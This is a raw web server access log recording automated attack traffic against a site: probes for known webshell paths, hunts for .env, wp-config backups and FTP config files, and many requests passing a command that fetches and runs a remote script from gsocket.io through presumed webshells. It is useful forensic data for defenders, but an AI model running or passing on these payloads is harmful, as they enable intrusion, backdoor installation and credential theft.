40.69.222.88 - - [15/Aug/2025:04:19:28 -0400] "GET /wp-admin/images/moon.php HTTP/1.1" 301 255 "-" "-"
40.69.222.88 - - [15/Aug/2025:04:19:29 -0400] "GET /wp-admin/includes/colour.php HTTP/1.1" 301 259 "-" "-"
40.69.222.88 - - [15/Aug/2025:04:19:29 -0400] "GET /wp-admin/includes/header.php HTTP/1.1" 301 259 "-" "-"
40.69.222.88 - - [15/Aug/2025:04:19:29 -0400] "GET /wp-admin/includes/index.php HTTP/1.1" 301 258 "-" "-"
40.69.222.88 - - [15/Aug/2025:04:19:29 -0400] "GET /wp-admin/install.php HTTP/1.1" 301 251 "-" "-"
40.69.222.88 - - [15/Aug/2025:04:19:30 -0400] "GET /wp-admin/js/autoload_classmap.php HTTP/1.1" 301 264 "-" "-"
40.69.222.88 - - [15/Aug/2025:04:19:30 -0400] "GET /wp-admin/js/index.php HTTP/1.1" 301 252 "-" "-"
40.69.222.88 - - [15/Aug/2025:04:19:30 -0400] "GET /wp-admin/js/widgets/cloud.php HTTP/1.1" 301 260 "-" "-"
40.69.222.88 - - [15/Aug/2025:04:19:31 -0400] "GET /wp-admin/js/widgets/index.php HTTP/1.1" 301 260 "-" "-"
40.69.222.88 - - [15/Aug/2025:04:19:31 -0400] "GET /wp-admin/mah.php HTTP/1.1" 301 247 "-" "-"
40.69.222.88 - - [15/Aug/2025:04:19:31 -0400] "GET /wp-admin/maint/about.php HTTP/1.1" 301 255 "-" "-"
40.69.222.88 - - [15/Aug/2025:04:19:31 -0400] "GET /wp-admin/network/network.php HTTP/1.1" 301 259 "-" "-"
40.69.222.88 - - [15/Aug/2025:04:19:32 -0400] "GET /wp-admin/wp-admins.php HTTP/1.1" 301 253 "-" "-"
40.69.222.88 - - [15/Aug/2025:04:19:32 -0400] "GET /wp-admin/wp-login.php HTTP/1.1" 301 252 "-" "-"
40.69.222.88 - - [15/Aug/2025:04:19:32 -0400] "GET /wp-admin/wp.php HTTP/1.1" 301 246 "-" "-"
40.69.222.88 - - [15/Aug/2025:04:19:32 -0400] "GET /wp-api.php HTTP/1.1" 301 241 "-" "-"
40.69.222.88 - - [15/Aug/2025:04:19:33 -0400] "GET /wp-comments.php HTTP/1.1" 301 246 "-" "-"
40.69.222.88 - - [15/Aug/2025:04:19:33 -0400] "GET /wp-content/1.php HTTP/1.1" 301 247 "-" "-"
40.69.222.88 - - [15/Aug/2025:04:19:33 -0400] "GET /wp-content/about.php HTTP/1.1" 301 251 "-" "-"
40.69.222.88 - - [15/Aug/2025:04:19:33 -0400] "GET /wp-content/autoload_classmap.php HTTP/1.1" 301 263 "-" "-"
40.69.222.88 - - [15/Aug/2025:04:19:34 -0400] "GET /wp-content/classwithtostring.php HTTP/1.1" 301 263 "-" "-"
40.69.222.88 - - [15/Aug/2025:04:19:34 -0400] "GET /wp-content/click.php HTTP/1.1" 301 251 "-" "-"
40.69.222.88 - - [15/Aug/2025:04:19:34 -0400] "GET /wp-content/index.php HTTP/1.1" 301 251 "-" "-"
40.69.222.88 - - [15/Aug/2025:04:19:34 -0400] "GET /wp-content/languages/autoload_classmap.php HTTP/1.1" 301 273 "-" "-"
40.69.222.88 - - [15/Aug/2025:04:19:35 -0400] "GET /wp-content/plugin.php HTTP/1.1" 301 252 "-" "-"
40.69.222.88 - - [15/Aug/2025:04:19:35 -0400] "GET /wp-content/plugins/WordPressCore/include.php HTTP/1.1" 301 275 "-" "-"
40.69.222.88 - - [15/Aug/2025:04:19:35 -0400] "GET /wp-content/plugins/autoload_classmap.php HTTP/1.1" 301 271 "-" "-"
40.69.222.88 - - [15/Aug/2025:04:19:36 -0400] "GET /wp-content/plugins/ioxi/ioxi/dropdown.php HTTP/1.1" 301 272 "-" "-"
40.69.222.88 - - [15/Aug/2025:04:19:36 -0400] "GET /wp-content/plugins/pwnd/as.php HTTP/1.1" 301 261 "-" "-"
40.69.222.88 - - [15/Aug/2025:04:19:36 -0400] "GET /wp-content/plugins/revslider/includes/external/page/index.php HTTP/1.1" 301 292 "-" "-"
40.69.222.88 - - [15/Aug/2025:04:19:36 -0400] "GET /wp-content/plugins/up/main.php HTTP/1.1" 301 261 "-" "-"
40.69.222.88 - - [15/Aug/2025:04:19:37 -0400] "GET /wp-content/themes/admin.php HTTP/1.1" 301 258 "-" "-"
40.69.222.88 - - [15/Aug/2025:04:19:37 -0400] "GET /wp-content/uploads/chosen.php HTTP/1.1" 301 260 "-" "-"
40.69.222.88 - - [15/Aug/2025:04:19:37 -0400] "GET /wp-content/uploads/de_fb_uploads/b.php HTTP/1.1" 301 269 "-" "-"
40.69.222.88 - - [15/Aug/2025:04:19:37 -0400] "GET /wp-content/uploads/json.php HTTP/1.1" 301 258 "-" "-"
40.69.222.88 - - [15/Aug/2025:04:19:38 -0400] "GET /wp-content/wp.php HTTP/1.1" 301 248 "-" "-"
40.69.222.88 - - [15/Aug/2025:04:19:38 -0400] "GET /wp-content/x.php HTTP/1.1" 301 247 "-" "-"
40.69.222.88 - - [15/Aug/2025:04:19:38 -0400] "GET /wp-error.php HTTP/1.1" 301 243 "-" "-"
40.69.222.88 - - [15/Aug/2025:04:19:38 -0400] "GET /wp-includes/ALFA_DATA/alfacgiapi/perl.alfa HTTP/1.1" 301 273 "-" "-"
40.69.222.88 - - [15/Aug/2025:04:19:39 -0400] "GET /wp-includes/IXR/autoload_classmap.php HTTP/1.1" 301 268 "-" "-"
40.69.222.88 - - [15/Aug/2025:04:19:39 -0400] "GET /wp-includes/IXR/chosen.php HTTP/1.1" 301 257 "-" "-"
40.69.222.88 - - [15/Aug/2025:04:19:39 -0400] "GET /wp-includes/PHPMailer/file.php HTTP/1.1" 301 261 "-" "-"
40.69.222.88 - - [15/Aug/2025:04:19:39 -0400] "GET /wp-includes/SimplePie/chosen.php HTTP/1.1" 301 263 "-" "-"
40.69.222.88 - - [15/Aug/2025:04:19:40 -0400] "GET /wp-includes/about.php HTTP/1.1" 301 252 "-" "-"
40.69.222.88 - - [15/Aug/2025:04:19:40 -0400] "GET /wp-includes/blocks/about.php HTTP/1.1" 301 259 "-" "-"
40.69.222.88 - - [15/Aug/2025:04:19:40 -0400] "GET /wp-includes/blocks/calendar/index.php HTTP/1.1" 301 268 "-" "-"
40.69.222.88 - - [15/Aug/2025:04:19:40 -0400] "GET /wp-includes/blocks/site-title/index.php HTTP/1.1" 301 270 "-" "-"
40.69.222.88 - - [15/Aug/2025:04:19:41 -0400] "GET /wp-includes/certificates/chosen.php HTTP/1.1" 301 266 "-" "-"
40.69.222.88 - - [15/Aug/2025:04:19:41 -0400] "GET /wp-includes/css/autoload_classmap.php HTTP/1.1" 301 268 "-" "-"
40.69.222.88 - - [15/Aug/2025:04:19:41 -0400] "GET /wp-includes/fonts/admin.php HTTP/1.1" 301 258 "-" "-"
40.69.222.88 - - [15/Aug/2025:04:19:42 -0400] "GET /wp-includes/fonts/autoload_classmap.php HTTP/1.1" 301 270 "-" "-"
40.69.222.88 - - [15/Aug/2025:04:19:42 -0400] "GET /wp-includes/fonts/index.php HTTP/1.1" 301 258 "-" "-"
40.69.222.88 - - [15/Aug/2025:04:19:42 -0400] "GET /wp-includes/html-api/about.php HTTP/1.1" 301 261 "-" "-"
40.69.222.88 - - [15/Aug/2025:04:19:42 -0400] "GET /wp-includes/js/tinymce/langs/about.php HTTP/1.1" 301 269 "-" "-"
40.69.222.88 - - [15/Aug/2025:04:19:43 -0400] "GET /wp-includes/rest-api/index.php HTTP/1.1" 301 261 "-" "-"
40.69.222.88 - - [15/Aug/2025:04:19:43 -0400] "GET /wp-includes/style-engine/autoload_classmap.php HTTP/1.1" 301 277 "-" "-"
40.69.222.88 - - [15/Aug/2025:04:19:43 -0400] "GET /wp-includes/widgets/autoload_classmap.php HTTP/1.1" 301 272 "-" "-"
40.69.222.88 - - [15/Aug/2025:04:19:43 -0400] "GET /wp-includes/wp-class.php HTTP/1.1" 301 255 "-" "-"
40.69.222.88 - - [15/Aug/2025:04:19:44 -0400] "GET /wp-includes/wp_class_datlib.php HTTP/1.1" 301 262 "-" "-"
40.69.222.88 - - [15/Aug/2025:04:19:44 -0400] "GET /wp-l0gin.php HTTP/1.1" 301 243 "-" "-"
40.69.222.88 - - [15/Aug/2025:04:19:44 -0400] "GET /wp-login.php HTTP/1.1" 301 243 "-" "-"
40.69.222.88 - - [15/Aug/2025:04:19:44 -0400] "GET /wp-logs.php HTTP/1.1" 301 242 "-" "-"
40.69.222.88 - - [15/Aug/2025:04:19:45 -0400] "GET /wp-setting.php HTTP/1.1" 301 245 "-" "-"
40.69.222.88 - - [15/Aug/2025:04:19:45 -0400] "GET /wp-setup.php HTTP/1.1" 301 243 "-" "-"
40.69.222.88 - - [15/Aug/2025:04:19:45 -0400] "GET /wp-signin.php HTTP/1.1" 301 244 "-" "-"
40.69.222.88 - - [15/Aug/2025:04:19:45 -0400] "GET /wp-wso.php HTTP/1.1" 301 241 "-" "-"
40.69.222.88 - - [15/Aug/2025:04:19:46 -0400] "GET /wp.php HTTP/1.1" 301 237 "-" "-"
40.69.222.88 - - [15/Aug/2025:04:19:46 -0400] "GET /wp_wrong_datlib.php HTTP/1.1" 301 250 "-" "-"
40.69.222.88 - - [15/Aug/2025:04:19:46 -0400] "GET /wsa.php HTTP/1.1" 301 238 "-" "-"
40.69.222.88 - - [15/Aug/2025:04:19:47 -0400] "GET /wso.php HTTP/1.1" 301 238 "-" "-"
40.69.222.88 - - [15/Aug/2025:04:19:47 -0400] "GET /y.php HTTP/1.1" 301 236 "-" "-"
40.69.222.88 - - [15/Aug/2025:04:19:47 -0400] "GET /zwso.php HTTP/1.1" 301 239 "-" "-"
31.13.103.115 - - [15/Aug/2025:04:19:56 -0400] "GET /teeth-implant HTTP/1.1" 301 244 "-" "facebookexternalhit/1.1 (+http://www.facebook.com/externalhit_uatext.php)"
68.183.245.101 - - [15/Aug/2025:04:22:02 -0400] "GET /send.php HTTP/1.1" 301 239 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1"
206.189.247.132 - - [15/Aug/2025:04:22:02 -0400] "GET /send.php HTTP/1.1" 301 239 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1"
86.8.204.43 - - [15/Aug/2025:04:22:02 -0400] "GET /send.php HTTP/1.1" 301 239 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1"
144.126.240.247 - - [15/Aug/2025:04:22:02 -0400] "GET /send.php HTTP/1.1" 301 239 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1"
68.183.245.101 - - [15/Aug/2025:04:37:25 -0400] "GET /send.php HTTP/1.1" 301 239 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1"
144.126.240.247 - - [15/Aug/2025:04:37:25 -0400] "GET /send.php HTTP/1.1" 301 239 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1"
206.189.247.132 - - [15/Aug/2025:04:37:25 -0400] "GET /send.php HTTP/1.1" 301 239 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1"
86.8.204.43 - - [15/Aug/2025:04:37:26 -0400] "GET /send.php HTTP/1.1" 301 239 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1"
4.43.184.114 - - [15/Aug/2025:04:43:57 -0400] "GET / HTTP/1.0" 301 231 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.23) Gecko/20110920 Firefox/3.6.23"
126.209.55.222 - - [15/Aug/2025:04:45:54 -0400] "POST /dental-tourism/teeth-implant/wp-login.php HTTP/1.1" 301 276 "http://www.orthosquare.in" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:72.0) Gecko/20100101 Firefox/72.0"
157.66.55.114 - - [15/Aug/2025:04:47:13 -0400] "POST /register HTTP/1.1" 301 239 "-" "python-requests/2.32.4"
157.66.55.114 - - [15/Aug/2025:04:47:14 -0400] "GET /.env HTTP/1.1" 301 235 "-" "python-requests/2.32.4"
157.66.55.114 - - [15/Aug/2025:04:47:15 -0400] "POST /register HTTP/1.1" 301 239 "-" "python-requests/2.32.4"
157.66.55.114 - - [15/Aug/2025:04:47:16 -0400] "GET /.env-old HTTP/1.1" 301 239 "-" "python-requests/2.32.4"
157.66.55.114 - - [15/Aug/2025:04:47:17 -0400] "POST /register HTTP/1.1" 301 239 "-" "python-requests/2.32.4"
157.66.55.114 - - [15/Aug/2025:04:47:18 -0400] "GET /.env.old HTTP/1.1" 301 239 "-" "python-requests/2.32.4"
157.66.55.114 - - [15/Aug/2025:04:47:19 -0400] "POST /register HTTP/1.1" 301 239 "-" "python-requests/2.32.4"
157.66.55.114 - - [15/Aug/2025:04:47:20 -0400] "GET /.env-bak HTTP/1.1" 301 239 "-" "python-requests/2.32.4"
157.66.55.114 - - [15/Aug/2025:04:47:21 -0400] "POST /register HTTP/1.1" 301 239 "-" "python-requests/2.32.4"
157.66.55.114 - - [15/Aug/2025:04:47:22 -0400] "GET /.env.server HTTP/1.1" 301 242 "-" "python-requests/2.32.4"
157.66.55.114 - - [15/Aug/2025:04:47:23 -0400] "POST /register HTTP/1.1" 301 239 "-" "python-requests/2.32.4"
157.66.55.114 - - [15/Aug/2025:04:47:24 -0400] "GET /.env.backup HTTP/1.1" 301 242 "-" "python-requests/2.32.4"
157.66.55.114 - - [15/Aug/2025:04:47:25 -0400] "POST /register HTTP/1.1" 301 239 "-" "python-requests/2.32.4"
157.66.55.114 - - [15/Aug/2025:04:47:26 -0400] "GET /.env-backup HTTP/1.1" 301 242 "-" "python-requests/2.32.4"
157.66.55.114 - - [15/Aug/2025:04:47:27 -0400] "POST /register HTTP/1.1" 301 239 "-" "python-requests/2.32.4"
157.66.55.114 - - [15/Aug/2025:04:47:28 -0400] "GET /.env.bak HTTP/1.1" 301 239 "-" "python-requests/2.32.4"
157.66.55.114 - - [15/Aug/2025:04:47:30 -0400] "POST /register HTTP/1.1" 301 239 "-" "python-requests/2.32.4"
157.66.55.114 - - [15/Aug/2025:04:47:31 -0400] "GET /.env.dev HTTP/1.1" 301 239 "-" "python-requests/2.32.4"
157.66.55.114 - - [15/Aug/2025:04:47:32 -0400] "POST /register HTTP/1.1" 301 239 "-" "python-requests/2.32.4"
157.66.55.114 - - [15/Aug/2025:04:47:33 -0400] "GET /.vscode/sftp.json HTTP/1.1" 301 248 "-" "python-requests/2.32.4"
157.66.55.114 - - [15/Aug/2025:04:47:34 -0400] "POST /register HTTP/1.1" 301 239 "-" "python-requests/2.32.4"
157.66.55.114 - - [15/Aug/2025:04:47:35 -0400] "GET /sftp.json HTTP/1.1" 301 240 "-" "python-requests/2.32.4"
157.66.55.114 - - [15/Aug/2025:04:47:36 -0400] "POST /register HTTP/1.1" 301 239 "-" "python-requests/2.32.4"
157.66.55.114 - - [15/Aug/2025:04:47:37 -0400] "GET /config/ftp.config HTTP/1.1" 301 248 "-" "python-requests/2.32.4"
157.66.55.114 - - [15/Aug/2025:04:47:38 -0400] "POST /register HTTP/1.1" 301 239 "-" "python-requests/2.32.4"
157.66.55.114 - - [15/Aug/2025:04:47:39 -0400] "GET /sftp-config.json HTTP/1.1" 301 247 "-" "python-requests/2.32.4"
157.66.55.114 - - [15/Aug/2025:04:47:40 -0400] "POST /register HTTP/1.1" 301 239 "-" "python-requests/2.32.4"
157.66.55.114 - - [15/Aug/2025:04:47:41 -0400] "GET /ftp.conf HTTP/1.1" 301 239 "-" "python-requests/2.32.4"
157.66.55.114 - - [15/Aug/2025:04:47:42 -0400] "POST /register HTTP/1.1" 301 239 "-" "python-requests/2.32.4"
157.66.55.114 - - [15/Aug/2025:04:47:43 -0400] "GET /ftp.config HTTP/1.1" 301 241 "-" "python-requests/2.32.4"
157.66.55.114 - - [15/Aug/2025:04:47:44 -0400] "POST /register HTTP/1.1" 301 239 "-" "python-requests/2.32.4"
157.66.55.114 - - [15/Aug/2025:04:47:45 -0400] "GET /ftp-config.conf HTTP/1.1" 301 246 "-" "python-requests/2.32.4"
157.66.55.114 - - [15/Aug/2025:04:47:46 -0400] "POST /register HTTP/1.1" 301 239 "-" "python-requests/2.32.4"
157.66.55.114 - - [15/Aug/2025:04:47:47 -0400] "GET /ftp-config.json HTTP/1.1" 301 246 "-" "python-requests/2.32.4"
157.66.55.114 - - [15/Aug/2025:04:47:48 -0400] "POST /register HTTP/1.1" 301 239 "-" "python-requests/2.32.4"
157.66.55.114 - - [15/Aug/2025:04:47:49 -0400] "GET /ftps.conf HTTP/1.1" 301 240 "-" "python-requests/2.32.4"
157.66.55.114 - - [15/Aug/2025:04:47:50 -0400] "POST /register HTTP/1.1" 301 239 "-" "python-requests/2.32.4"
157.66.55.114 - - [15/Aug/2025:04:47:51 -0400] "GET /ftps.config HTTP/1.1" 301 242 "-" "python-requests/2.32.4"
157.66.55.114 - - [15/Aug/2025:04:47:52 -0400] "POST /register HTTP/1.1" 301 239 "-" "python-requests/2.32.4"
157.66.55.114 - - [15/Aug/2025:04:47:53 -0400] "GET /configuration.php.bak HTTP/1.1" 301 252 "-" "python-requests/2.32.4"
157.66.55.114 - - [15/Aug/2025:04:47:54 -0400] "POST /register HTTP/1.1" 301 239 "-" "python-requests/2.32.4"
157.66.55.114 - - [15/Aug/2025:04:47:55 -0400] "GET /configuration.php-dist HTTP/1.1" 301 253 "-" "python-requests/2.32.4"
157.66.55.114 - - [15/Aug/2025:04:47:56 -0400] "POST /register HTTP/1.1" 301 239 "-" "python-requests/2.32.4"
157.66.55.114 - - [15/Aug/2025:04:47:58 -0400] "GET /wp-config.php.bak HTTP/1.1" 301 248 "-" "python-requests/2.32.4"
157.66.55.114 - - [15/Aug/2025:04:47:59 -0400] "POST /register HTTP/1.1" 301 239 "-" "python-requests/2.32.4"
157.66.55.114 - - [15/Aug/2025:04:48:00 -0400] "GET /wp-config.php-dist HTTP/1.1" 301 249 "-" "python-requests/2.32.4"
157.66.55.114 - - [15/Aug/2025:04:48:01 -0400] "POST /register HTTP/1.1" 301 239 "-" "python-requests/2.32.4"
157.66.55.114 - - [15/Aug/2025:04:48:02 -0400] "GET /wp-config.php-bak HTTP/1.1" 301 248 "-" "python-requests/2.32.4"
157.66.55.114 - - [15/Aug/2025:04:48:03 -0400] "POST /register HTTP/1.1" 301 239 "-" "python-requests/2.32.4"
157.66.55.114 - - [15/Aug/2025:04:48:04 -0400] "GET /wp-config.php.ori HTTP/1.1" 301 248 "-" "python-requests/2.32.4"
157.66.55.114 - - [15/Aug/2025:04:48:05 -0400] "POST /register HTTP/1.1" 301 239 "-" "python-requests/2.32.4"
157.66.55.114 - - [15/Aug/2025:04:48:06 -0400] "GET /wp-config.php-old HTTP/1.1" 301 248 "-" "python-requests/2.32.4"
157.66.55.114 - - [15/Aug/2025:04:48:07 -0400] "POST /register HTTP/1.1" 301 239 "-" "python-requests/2.32.4"
157.66.55.114 - - [15/Aug/2025:04:48:08 -0400] "GET /wp-config.php.old HTTP/1.1" 301 248 "-" "python-requests/2.32.4"
157.66.55.114 - - [15/Aug/2025:04:48:08 -0400] "POST /register HTTP/1.1" 301 239 "-" "python-requests/2.32.4"
157.66.55.114 - - [15/Aug/2025:04:48:09 -0400] "GET /web/config/ftp.config HTTP/1.1" 301 252 "-" "python-requests/2.32.4"
157.66.55.114 - - [15/Aug/2025:04:48:10 -0400] "POST /register HTTP/1.1" 301 239 "-" "python-requests/2.32.4"
157.66.55.114 - - [15/Aug/2025:04:48:11 -0400] "GET /wp-config.php.old HTTP/1.1" 301 248 "-" "python-requests/2.32.4"
157.66.55.114 - - [15/Aug/2025:04:48:12 -0400] "POST /register HTTP/1.1" 301 239 "-" "python-requests/2.32.4"
157.66.55.114 - - [15/Aug/2025:04:48:13 -0400] "GET /register HTTP/1.1" 301 239 "-" "python-requests/2.32.4"
157.66.55.114 - - [15/Aug/2025:04:48:14 -0400] "POST /register HTTP/1.1" 301 239 "-" "python-requests/2.32.4"
157.66.55.114 - - [15/Aug/2025:04:48:15 -0400] "GET /admin/register HTTP/1.1" 301 245 "-" "python-requests/2.32.4"
157.66.55.114 - - [15/Aug/2025:04:48:16 -0400] "POST /register HTTP/1.1" 301 239 "-" "python-requests/2.32.4"
157.66.55.114 - - [15/Aug/2025:04:48:17 -0400] "GET /backend/register HTTP/1.1" 301 247 "-" "python-requests/2.32.4"
157.66.55.114 - - [15/Aug/2025:04:48:18 -0400] "POST /register HTTP/1.1" 301 239 "-" "python-requests/2.32.4"
157.66.55.114 - - [15/Aug/2025:04:48:19 -0400] "GET /auth/register HTTP/1.1" 301 244 "-" "python-requests/2.32.4"
146.190.82.85 - - [15/Aug/2025:04:50:38 -0400] "GET /wp-content/plugins/pwnd/pwnd.php HTTP/1.1" 301 263 "-" "Mozilla/5.0"
68.183.245.101 - - [15/Aug/2025:04:53:35 -0400] "GET /send.php HTTP/1.1" 301 239 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1"
206.189.247.132 - - [15/Aug/2025:04:53:35 -0400] "GET /send.php HTTP/1.1" 301 239 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1"
86.8.204.43 - - [15/Aug/2025:04:53:35 -0400] "GET /send.php HTTP/1.1" 301 239 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1"
144.126.240.247 - - [15/Aug/2025:04:53:35 -0400] "GET /send.php HTTP/1.1" 301 239 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1"
86.8.204.43 - - [15/Aug/2025:05:07:33 -0400] "GET /send.php HTTP/1.1" 301 239 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1"
206.189.247.132 - - [15/Aug/2025:05:07:33 -0400] "GET /send.php HTTP/1.1" 301 239 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1"
68.183.245.101 - - [15/Aug/2025:05:07:33 -0400] "GET /send.php HTTP/1.1" 301 239 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1"
144.126.240.247 - - [15/Aug/2025:05:07:33 -0400] "GET /send.php HTTP/1.1" 301 239 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1"
152.42.233.9 - - [15/Aug/2025:05:19:36 -0400] "GET /local/moodle_webshell/webshell.php?action=exec&cmd=bash%20-c%20%22$(curl%20-fsSL%20https://gsocket.io/y)%22 HTTP/1.1" 301 342 "-" "python-requests/2.32.4"
152.42.233.9 - - [15/Aug/2025:05:19:37 -0400] "GET /cmd.php?cmd=bash%20-c%20%22$(curl%20-fsSL%20https://gsocket.io/y)%22 HTTP/1.1" 301 299 "-" "python-requests/2.32.4"
152.42.233.9 - - [15/Aug/2025:05:19:37 -0400] "GET /exec.php?exec=bash%20-c%20%22$(curl%20-fsSL%20https://gsocket.io/y)%22 HTTP/1.1" 301 301 "-" "python-requests/2.32.4"
152.42.233.9 - - [15/Aug/2025:05:19:38 -0400] "GET /modules/mod_webshell/mod_webshell.php?action=exec&cmd=bash%20-c%20%22$(curl%20-fsSL%20https://gsocket.io/y)%22 HTTP/1.1" 301 345 "-" "python-requests/2.32.4"
152.42.233.9 - - [15/Aug/2025:05:19:39 -0400] "GET /all/modules/views-7.x-3.24/views/shell.php?cmd=bash%20-c%20%22$(curl%20-fsSL%20https://gsocket.io/y)%22 HTTP/1.1" 301 334 "-" "python-requests/2.32.4"
152.42.233.9 - - [15/Aug/2025:05:19:39 -0400] "GET /modules/drupal_rce/drupal_rce/shell.php?cmd=bash%20-c%20%22$(curl%20-fsSL%20https://gsocket.io/y)%22 HTTP/1.1" 301 331 "-" "python-requests/2.32.4"
152.42.233.9 - - [15/Aug/2025:05:19:40 -0400] "GET /modules/ctools-8.x-3.4/ctools/shell.php?cmd=bash%20-c%20%22$(curl%20-fsSL%20https://gsocket.io/y)%22 HTTP/1.1" 301 331 "-" "python-requests/2.32.4"
152.42.233.9 - - [15/Aug/2025:05:19:40 -0400] "GET /sites/all/modules/views-7.x-3.24/views/shell.php?cmd=bash%20-c%20%22$(curl%20-fsSL%20https://gsocket.io/y)%22 HTTP/1.1" 301 340 "-" "python-requests/2.32.4"
152.42.233.9 - - [15/Aug/2025:05:19:41 -0400] "GET /blocks/rce/lang/en/block_rce.php?cmd=bash%20-c%20%22$(curl%20-fsSL%20https://gsocket.io/y)%22 HTTP/1.1" 301 324 "-" "python-requests/2.32.4"
152.42.233.9 - - [15/Aug/2025:05:19:41 -0400] "GET /moodle/blocks/rce/lang/en/block_rce.php?cmd=bash%20-c%20%22$(curl%20-fsSL%20https://gsocket.io/y)%22 HTTP/1.1" 301 331 "-" "python-requests/2.32.4"
152.42.233.9 - - [15/Aug/2025:05:19:42 -0400] "GET /moodle/local/moodle_webshell/webshell.php?action=exec&cmd=bash%20-c%20%22$(curl%20-fsSL%20https://gsocket.io/y)%22 HTTP/1.1" 301 349 "-" "python-requests/2.32.4"
152.42.233.9 - - [15/Aug/2025:05:19:42 -0400] "GET /aulavirtual/blocks/rce/lang/en/block_rce.php?cmd=bash%20-c%20%22$(curl%20-fsSL%20https://gsocket.io/y)%22 HTTP/1.1" 301 336 "-" "python-requests/2.32.4"
152.42.233.9 - - [15/Aug/2025:05:19:43 -0400] "GET /aulavirtual/local/moodle_webshell/webshell.php?action=exec&cmd=bash%20-c%20%22$(curl%20-fsSL%20https://gsocket.io/y)%22 HTTP/1.1" 301 354 "-" "python-requests/2.32.4"
152.42.233.9 - - [15/Aug/2025:05:19:44 -0400] "GET /campus/blocks/rce/lang/en/block_rce.php?cmd=bash%20-c%20%22$(curl%20-fsSL%20https://gsocket.io/y)%22 HTTP/1.1" 301 331 "-" "python-requests/2.32.4"
152.42.233.9 - - [15/Aug/2025:05:19:44 -0400] "GET /campus/local/moodle_webshell/webshell.php?action=exec&cmd=bash%20-c%20%22$(curl%20-fsSL%20https://gsocket.io/y)%22 HTTP/1.1" 301 349 "-" "python-requests/2.32.4"
152.42.233.9 - - [15/Aug/2025:05:19:45 -0400] "GET /uploads/cmd.php?cmd=bash%20-c%20%22$(curl%20-fsSL%20https://gsocket.io/y)%22 HTTP/1.1" 301 307 "-" "python-requests/2.32.4"
152.42.233.9 - - [15/Aug/2025:05:19:45 -0400] "GET /img/cmd.php?cmd=bash%20-c%20%22$(curl%20-fsSL%20https://gsocket.io/y)%22 HTTP/1.1" 301 303 "-" "python-requests/2.32.4"
152.42.233.9 - - [15/Aug/2025:05:19:47 -0400] "GET /command.php?cmd=bash%20-c%20%22$(curl%20-fsSL%20https://gsocket.io/y)%22 HTTP/1.1" 301 303 "-" "python-requests/2.32.4"
152.42.233.9 - - [15/Aug/2025:05:19:47 -0400] "GET /cmd.php?exec=bash%20-c%20%22$(curl%20-fsSL%20https://gsocket.io/y)%22 HTTP/1.1" 301 300 "-" "python-requests/2.32.4"
152.42.233.9 - - [15/Aug/2025:05:19:48 -0400] "GET /command.php?exec=bash%20-c%20%22$(curl%20-fsSL%20https://gsocket.io/y)%22 HTTP/1.1" 301 304 "-" "python-requests/2.32.4"
152.42.233.9 - - [15/Aug/2025:05:19:48 -0400] "GET /img/cmd.php?exec=bash%20-c%20%22$(curl%20-fsSL%20https://gsocket.io/y)%22 HTTP/1.1" 301 304 "-" "python-requests/2.32.4"
152.42.233.9 - - [15/Aug/2025:05:19:49 -0400] "GET /upload/cmd.php?exec=bash%20-c%20%22$(curl%20-fsSL%20https://gsocket.io/y)%22 HTTP/1.1" 301 307 "-" "python-requests/2.32.4"
152.42.233.9 - - [15/Aug/2025:05:19:50 -0400] "GET /uploads/cmd.php?exec=bash%20-c%20%22$(curl%20-fsSL%20https://gsocket.io/y)%22 HTTP/1.1" 301 308 "-" "python-requests/2.32.4"
